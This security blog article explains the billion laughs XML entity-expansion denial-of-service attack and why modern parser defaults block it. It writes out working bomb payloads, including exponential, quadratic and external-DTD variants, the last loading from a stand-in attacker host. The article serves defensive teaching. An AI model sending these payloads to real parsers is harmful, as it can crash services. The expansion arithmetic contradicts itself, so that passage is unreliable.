Billion Laughs Attack: XML Entity Bomb in 2026

The billion laughs attack is the original XML denial-of-service trick: a payload that fits inside a single HTTP request but, if the parser expands it naively, explodes into roughly a billion characters of memory before the parse completes. It is the textbook parser-resource-exhaustion bug, and in 2018 every "XML security" talk closed with the same screenshot of a lol6 payload melting a server. In 2026 that screenshot is a museum piece for one specific reason: libxml has shipped a default entity-expansion ceiling for over a decade, and a modern PHP, Python, or .NET parser refuses the payload before it costs anything. The attack is still worth knowing because the family is bigger than XML, and because the protection is a single flag away from being switched off.

This article is a variant deep-dive under the XML External Entity guide. I cover the exact payload, the math behind the exponential blow-up, why this is a parser-side rather than a network-side DoS, what libxml's default ceiling actually does, a working walk-through against the xxe-basic lab, the variants the same ceiling still catches, the analogous bombs in YAML / JSON / protobuf, and the fix when an application genuinely needs entity expansion turned up.

TL;DR

Billion laughs is an XML payload that declares a small chain of nested entities, each one ten times longer than the previous, six levels deep. The on-wire document is a few hundred bytes. A parser that expands every entity reference end to end produces roughly one billion characters of substituted text inside the parse tree, exhausting memory in seconds. The attack assumes the parser will do unbounded entity expansion. Modern libxml does not: since the 2.9.x line it enforces an entity-expansion ceiling by default, refuses any document that crosses it, and surfaces a parse error instead. PHP's DOMDocument, Python's lxml, and .NET's XmlReader all inherit safe defaults. The realistic 2026 attack surface is legacy code that opts out (LIBXML_PARSEHUGE in PHP, XML_PARSE_HUGE in C), older parsers, custom XML stacks, and the non-XML analogues in YAML, JSON deep-nesting, protobuf recursion, and zip bombs.

The exact payload

The payload that gave the attack its name is the lol6 chain from the original 2003 disclosure, reproduced in the Wikipedia article:

code

<?xml version="1.0"?>
<!DOCTYPE lolz [
  <!ENTITY lol "lol">
  <!ENTITY lol2 "&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;">
  <!ENTITY lol3 "&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;">
  <!ENTITY lol4 "&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;">
  <!ENTITY lol5 "&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;">
  <!ENTITY lol6 "&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;">
]>
<root>&lol6;</root>

The fence has no language tag on purpose: MDX's parser is happy with raw XML inside a plain code block and unhappy with the {n,m}-shaped tokens that show up later in this article, so the convention across the techearl XXE pages is to leave XML fenced without a language hint.

Reading line by line:

lol is the base case. One entity whose value is the literal three-character string lol.
lol2 is ten references to lol. Fully expanded, it is 30 characters.
lol3 is ten references to lol2. Fully expanded, it is 300 characters (10 times the previous level).
Each subsequent level (lol4, lol5, lol6) is again ten references to the previous level.
The document body contains a single reference to lol6.

The DTD body itself is small. The whole payload fits in a few hundred bytes on the wire. The work all happens at parse time, when the parser walks the entity chain to expand &lol6; into the substituted text that the parse tree is supposed to contain.

The math

Six levels, ten-way fanout per level. The size of the fully-expanded lol6 reference is:

10^6 references to lol times 3 characters per lol, equals 3 times 10^6 characters. That number, multiplied by the literal lol string size, lands at roughly 3 billion bytes if the parser materialises the substitution; the "billion" in the name is the substitution count (10^9 entity expansions across all levels) rather than the final byte count, which is why different write-ups quote slightly different numbers. The detail that matters in practice is the ratio: a few hundred bytes of input forces gigabytes of allocated memory.

A naive parser does this expansion eagerly, materialising each lol_n+1 as the concatenation of ten lol_n substitutions before storing it in the entity table. Memory pressure is what kills the process. Older XML parsers crashed outright; saturated servers OOM-killed the worker; in a few documented cases an entire app server dropped because the worker pool was wedged inside the parse. None of this requires the attacker to be authenticated or to send anything but a single small request.

Parser-side, not network-side

This is the part that makes entity-expansion bombs a different shape of problem than ordinary network DoS.

A volumetric DoS needs an asymmetric upstream link, a botnet, or an amplification vector. A SYN flood needs enough source addresses to outpace the connection table. A slowloris needs to hold open more sockets than the server has worker slots. All of them are visible at the network layer, all of them are within the remit of a CDN or a layer-7 WAF.

Billion laughs is a single, small, well-formed HTTP POST. A few KB on the wire. The CDN forwards it without complaint. The WAF, unless it has been taught to look at DOCTYPE bodies and count entity references, sees a normal XML body. The cost is entirely on the parser side. A 2 KB request consumes gigabytes of server memory. The amplification ratio is north of a million to one, and it lives one layer below the network the perimeter is watching.

This is the same shape of problem as a SQL injection that triggers a Cartesian join (small query, huge plan) or a regex catastrophic backtracking ReDoS (small input, exponential matcher work). The work happens inside an interpreter the perimeter cannot see into.

Why modern libxml defaults block it

libxml, the C XML library that backs PHP's DOMDocument, Python's lxml, Perl's XML::LibXML, Ruby's Nokogiri, and a long tail of language bindings, ships with a hard entity-expansion ceiling on by default. The exact constant has shifted across the 2.9.x series, but the shape is constant: the parser tracks total entity-substitution size across the document, and if the cumulative expansion would cross the ceiling, it aborts the parse with a diagnostic of the form Detected an entity reference loop or entity X already defined or, depending on the build, Maximum entity amplification factor exceeded.

The ceiling has been the default for the entire useful life of PHP 8.x. You do not need to do anything to your code to get it. A new DOMDocument() plus $dom->loadXML($untrusted) is safe against billion laughs as written, today, with no additional flags.

The flag that turns the protection off is LIBXML_PARSEHUGE (in PHP; XML_PARSE_HUGE at the C layer). Passing it to loadXML disables the entity-expansion ceiling along with several other size limits the parser enforces. There is exactly one good reason to reach for it: you have a legitimate, trusted, very large XML document that hits the default ceiling on legitimate content. If that is not your situation, do not pass the flag. If you cannot remember why your codebase passes the flag, remove it and run your tests.

This is the same shape of advice as the rest of the XXE story: the unsafe configuration is opt-in, the safe configuration is the default, and the production bugs are concentrated in code where someone copied a Stack Overflow snippet that opted in without explaining why.

Lab walkthrough: the `xxe-basic` import endpoint

The xxe-basic lab in the techearl-labs repo sets the unsafe XXE flags (LIBXML_NOENT | LIBXML_DTDLOAD | LIBXML_NOCDATA) so it can demonstrate the file-read and OOB variants from the parent article. It deliberately does not pass LIBXML_PARSEHUGE, which means the default entity-expansion ceiling is intact. That is the right shape for this scenario: the lab is unsafe for entity resolution and safe for entity expansion, and you can prove both in the same container.

Bring up the lab:

bash

docker compose up xxe-basic

Save the lol6 payload from earlier in this article to payload.xml, then POST it to the import endpoint:

bash

curl -s -X POST --data-binary @payload.xml \
  -H 'Content-Type: application/xml' \
  http://localhost:8086/import.php

The response is an XML parse error page from the lab's error handler, carrying a libxml diagnostic about the entity-expansion limit. The interesting part is what does not happen. Watch container resources in another terminal:

bash

docker stats xxe-basic

CPU stays at a fraction of a core. Memory stays at whatever the PHP-FPM workers were already using. The parse aborts long before the substitution would materialise. The endpoint serves the next request normally; the worker pool is not wedged; nothing in docker compose logs xxe-basic says anything more dramatic than "request returned 400".

This is the right answer for a deliberately vulnerable lab: the attack is documented, the default mitigation is documented, and the mitigation visibly fires. If you wanted to see the attack succeed, you would have to fork the lab to pass LIBXML_PARSEHUGE to loadXML. That is not a footgun you walk into by accident.

Variants the same ceiling catches

The exponential six-level chain is the famous shape, but it is not the only one the entity-expansion ceiling has to defend against. Two adjacent variants are worth knowing.

Quadratic blowup

Quadratic blowup skips the nested-chain trick and just declares a single, long entity, then references it many times in the document body:

code

<?xml version="1.0"?>
<!DOCTYPE lolz [
  <!ENTITY a "aaaaaaaaaaaaaaaaaaaaaaaa... (50 KB of 'a') ...">
]>
<root>
  <x>&a;</x>
  <x>&a;</x>
  <x>&a;</x>
  ... (10000 copies) ...
</root>

50 KB times 10000 references is 500 MB of expansion. The amplification ratio is worse than a simple file but nowhere near the billion-laughs ratio; on the other hand, the structure is harder to spot in a "no DTD" WAF rule because there is only one entity declaration and it looks unremarkable. The same libxml ceiling catches it: the parser tracks cumulative expansion, not nesting depth, and aborts at the same threshold. LIBXML_PARSEHUGE re-enables the bug.

External entity expansion

The third variant chains the bomb across an external DTD: a parameter entity in the inline DOCTYPE points at an attacker-controlled URL, the remote DTD declares the exponential chain, the inline document then references the top-level entity.

code

<?xml version="1.0"?>
<!DOCTYPE lolz [
  <!ENTITY % remote SYSTEM "http://attacker.example/bomb.dtd">
  %remote;
]>
<root>&lol6;</root>

Two defaults catch this. First, libxml since 2.9.0 has external-entity loading off by default, so the remote DTD does not load at all unless the application explicitly opted in (the same LIBXML_NOENT plus LIBXML_DTDLOAD combination that opens up classical XXE). Second, even if external loading is on, the entity-expansion ceiling still applies to the entities the remote DTD declares: the ceiling counts every substitution, regardless of where the declaration came from. You need both defaults turned off to land this variant, which is why it is essentially absent from production CVE history past the early 2010s.

The fix when you have to keep entity expansion enabled

Most applications do not need to. The rare ones that genuinely process trusted, structured XML with large legitimate entity expansion (think: a fully-validated DocBook publishing pipeline) need to raise the ceiling without removing it. The shape of the fix is the same across stacks:

PHP. Do not pass LIBXML_PARSEHUGE to loadXML. If you absolutely must (for a legitimate large document), pass it only on the trusted import path and keep it off for any endpoint that accepts attacker-controlled XML. There is no per-call "expansion limit" setting in PHP's libxml binding; the flag is binary.

Python. Use defusedxml for any untrusted input. It refuses entity declarations entirely, which closes the class off rather than tuning a limit. For lxml specifically, instantiate the parser with resolve_entities=False to disable expansion of declared entities altogether:

python

from lxml import etree
parser = etree.XMLParser(resolve_entities=False, no_network=True, load_dtd=False)
tree = etree.fromstring(untrusted_xml, parser)

Java. Enable XMLConstants.FEATURE_SECURE_PROCESSING on the factory, which (among other things) caps entity expansion. The exact ceiling is controlled by the jdk.xml.entityExpansionLimit system property, which defaults to 64000 expansions across recent JDKs. Raise it deliberately on the trusted code path if you have to; never disable it.

.NET. XmlReaderSettings.MaxCharactersFromEntities caps the total characters produced by entity expansion. The default is conservative (10 million on recent .NET versions). Set it explicitly on the settings object and pair it with DtdProcessing = DtdProcessing.Prohibit for any endpoint parsing arbitrary input.

The full per-parser configuration story for the rest of the XXE class is in the XML External Entity guide under "XXE in other parsers".

Analogous attacks in non-XML parsers

The entity-expansion family is broader than XML. The general shape is: a small input that triggers exponential, recursive, or repeated work inside a parser that did not defend its substitution layer. Every serialization format that supports references, aliases, or nested includes has had a member of the family.

YAML. The original "YAML billion laughs" used merge keys to reference the same anchor exponentially, similar in shape to the XML chain. PyYAML carried a vulnerability of this shape (verify the CVE ID against the upstream advisory before quoting; the PyYAML maintainers have hardened the safe-loader path across multiple releases). The fix is the same as the XML one: use the safe loader (yaml.safe_load), which refuses arbitrary tags and aliases.

JSON. JSON has no entity layer, but deeply-nested JSON triggers a different parser pathology: recursive-descent parsers can blow the call stack on a few hundred KB of [[[[...]]]]. Some streaming JSON parsers handle this; others crash. The fix is depth-limiting the parser, which most modern JSON libraries do by default.

Protocol Buffers. Protobuf message types can be recursive (a message that contains itself), and a hand-crafted wire payload can request a recursion depth that the decoder cannot handle. The protobuf runtimes ship a recursion limit (SetRecursionLimit in C++, CodedInputStream.SetRecursionLimit equivalents elsewhere) precisely for this reason.

Zip bombs. Same family, different parser layer. A small zip file that decompresses to many gigabytes, used historically against virus scanners and email gateways that expanded archives in memory. The fix is decompression-size and decompression-ratio limits on the unzip path. The 42 KB classic zip bomb is the spiritual sibling of the few-hundred-byte XML billion-laughs payload.

The pattern across all of these is the same: any layer that takes a short input and produces a longer output, recursively, needs an explicit cap on the output side. Parser authors learned this lesson over the 2010s; the defaults are now in the right place across most major libraries. The remaining risk lives in custom parsers, in third-party code that disabled the defaults, and in formats whose libraries are still maturing.

Real-world incidents

Three illustrative entries from the public CVE history, with the standard caveat that you should pull exact affected versions from the vendor advisory or NVD before quoting them:

CVE-2003-1564 is the original billion-laughs disclosure, filed against multiple XML parsers when the exponential-entity-expansion technique was first published. The interesting half is the breadth: half a dozen major XML stacks were vulnerable on the same day, because none of them had thought to cap entity expansion until somebody demonstrated why they should.
CVE-2013-2099 in Python's ssl.match_hostname is a regex-DoS rather than an XML one, but it is in the same family: a small malicious input forcing exponential parser work. I mention it to underline the family resemblance; the standard-library fix and the libxml fix landed in the same era and were driven by the same architectural lesson.
PyYAML's billion-laughs class has been raised against the unsafe loader across the project's history; the project documentation explicitly lists "expansion of YAML aliases" as a reason to prefer safe_load over load. Search the PyYAML changelog and the linked CVE entries when you need the specific identifiers; the headline behaviour is consistent across the disclosures.

The pattern across the history is that entity-expansion bombs are rarely the headline finding in a modern penetration test. They show up where someone has explicitly disabled a default, where a custom parser has reimplemented the substitution layer without the cap, or where a non-XML format's library is still catching up to the lessons libxml learned in 2003.

Where to go next

The parent guide is the XML External Entity practitioner walkthrough; it covers the entity-resolution side of the same parser surface, the in-band and out-of-band file-read variants, and the parameter-entity recursive chain. Sister spokes under the same hub: blind XXE and out-of-band exfil for the OOB primitive in detail, and XInclude attacks for the entity-free path that audits routinely miss. The hub is the web application security vulnerabilities taxonomy.

Only if the application explicitly opts out of the default protection (LIBXML_PARSEHUGE in PHP, XML_PARSE_HUGE in C, FEATURE_SECURE_PROCESSING disabled in Java, MaxCharactersFromEntities raised in .NET) or runs an ancient parser that predates the ceiling. A vanilla PHP 8.x DOMDocument, Python lxml, .NET XmlReader, or modern Java JAXP factory will refuse the payload without any application-side configuration.

The same one. libxml's entity-expansion ceiling counts total substitution size, not nesting depth, so a single long entity referenced many times hits the cap as readily as a six-level nested chain. The quadratic variant has a lower amplification ratio than the exponential one, but it is still firmly inside the ceiling that libxml enforces by default.

Yes, in the architectural sense. Both involve a small input producing exponentially larger output inside a parser or decoder, with the cost paid entirely on the server side. The mitigation pattern is the same too: cap the output side explicitly (entity-expansion ceiling for XML, decompression-size and decompression-ratio limits for zip). Different parser layer, same lesson.

JSON has no entity layer, so it cannot carry a billion-laughs payload as written, but a deeply-nested JSON document can still blow the call stack of a recursive-descent parser; the fix is a depth limit. YAML has the merge-key analogue, which PyYAML has hardened against by recommending yaml.safe_load over the unsafe loader. Both formats now ship with safe-by-default parsers in the major language ecosystems.

Occasionally, yes. A multi-megabyte DocBook document with a heavy entity-driven boilerplate section can hit the default ceiling on legitimate content. The right response is to raise the limit on the trusted import path (or pass the per-call equivalent), not to disable it globally. If the only way to make your code parse is to flip LIBXML_PARSEHUGE on for every request, you have a bigger architecture problem than entity expansion.

Billion Laughs Attack: XML Entity Expansion DoS and Why Defaults Now Block It

TL;DR

The exact payload

The math

Parser-side, not network-side

Why modern libxml defaults block it

Lab walkthrough: the `xxe-basic` import endpoint

Variants the same ceiling catches

Quadratic blowup

External entity expansion

The fix when you have to keep entity expansion enabled

Analogous attacks in non-XML parsers

Real-world incidents

Where to go next

Sources

Ishan Karunaratne

Related posts

Why Bind Mounts Are Slow on Mac and Windows (and What to Do)

How Attackers Steal Session Cookies via XSS (and Why HttpOnly Is Not Enough in 2026)

How to Match HTML Tags with Regex (And Why You Probably Shouldn't)

Can I still hit billion laughs in 2026?

Is there a defence against the quadratic blowup variant?

Are zip bombs the same family of attack?

What about JSON and YAML?

Does the entity-expansion ceiling block legitimate large XML documents?

Sources

Ishan Karunaratne